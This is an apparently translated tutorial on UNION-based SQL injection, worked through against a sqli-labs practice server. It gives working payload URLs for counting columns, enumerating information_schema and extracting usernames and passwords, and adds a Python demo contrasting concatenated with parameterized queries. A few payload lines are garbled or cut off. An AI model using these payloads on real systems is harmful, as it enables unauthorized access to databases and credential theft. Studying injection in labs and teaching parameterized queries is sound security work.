SQL injection

Example table columns: id, title, content, time, author

select * from news where id = 1;

select version();

select * from news where id = 1 order by 1;
ORDER BY n sorts the result by the n-th column, so it can be used to find out how many columns the query returns.

select * from holder where id = 1 union select 1,2,3,4,version();
UNION joins the output of two SQL queries; both queries must return the same number of columns.

Hands-on practice: http://10.1.2.5:10631/sqli/Less-2/?id=1

   First, http://10.1.2.5:10631/sqli/Less-2/?id=1 is equivalent to select * from holder where id = 1;

  http://10.1.2.5:10631/sqli/Less-2/?id=1 order by 1 is used to query the number of columns.

  Because the page only displays the first row of the result, http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,version() filters out the first row and outputs the desired data instead: the version number.

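group_concat() joins all values returned by the query into a single string, so every row is displayed at once.

information_schema is a database (library) that contains the following tables:

      schemata: stores the names of all databases

      tables: stores the names of all tables

      columns: stores the names of all columns (fields)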

Query all database names: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata
The schemata table of the information_schema database has a column named schema_name; this extracts all database names from it.

Query all tables in the current database: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()

Query all column names in a table: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = "users"

Query the contents of the table: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,group_concat(password),group_concat(username) from

 

http://10.1.2.5:10631/sqli/Less-1/?id=1'
The error report contains '1'' LIMIT 0, 1, which shows that the value of id= is followed by the rest of the statement, so order by cannot be appended directly. It should be like this http://10.1.2.5:10631/sqli/Less-1/?id=''LIMIT 01

http://10.1.2.5:10631/sqli/Less-4/?id=") union select 1,2,database() %23
When injecting, every symbol left unclosed by the original statement must be closed.
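
Added example (not part of the original post or of the lab's code): the Less-2 style query built by string concatenation, next to the same query with a bound parameter, run against the union payload from above. Assumptions: Python's sqlite3 stands in for the lab's MySQL, the table contents are constructed, and the function names are hypothetical.

```python
import sqlite3

# Constructed sample data; sqlite3 stands in for the lab's MySQL so this runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news (id integer, title text, content text, time text, author text);
        insert into news values (1, 'hello', 'first post', '2022-01-01', 'admin');
        create table users (id integer, username text, password text);
        insert into users values (1, 'alice', 'constructed-secret');
    """)
    return db

def fetch_news_vulnerable(db, raw_id):
    # The request parameter is pasted into the statement, so it is parsed as SQL.
    return db.execute("select * from news where id = " + raw_id).fetchall()

def fetch_news_safe(db, raw_id):
    # The parameter is bound as a value; the statement text never changes.
    return db.execute("select * from news where id = ?", (raw_id,)).fetchall()

def try_query(fn, db, raw_id):
    # Return rows, or the database error text (a useful detection signal in logs).
    try:
        return fn(db, raw_id)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

# Payload shapes taken from the text above, widened to the 5 columns of news.
UNION_PAYLOAD = "0 union select 1,2,3,4,group_concat(password) from users"
WRONG_COLUMNS = "0 union select 1,2,3"  # column count mismatch makes the UNION fail

if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", fetch_news_vulnerable), ("safe", fetch_news_safe)):
        for value in ("1", UNION_PAYLOAD, WRONG_COLUMNS):
            print(label, repr(value), "->", try_query(fn, db, value))
```

With the bound parameter, both payloads are compared to id as plain text and match no row; the concatenated version returns the users data or raises a column-count error.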

 
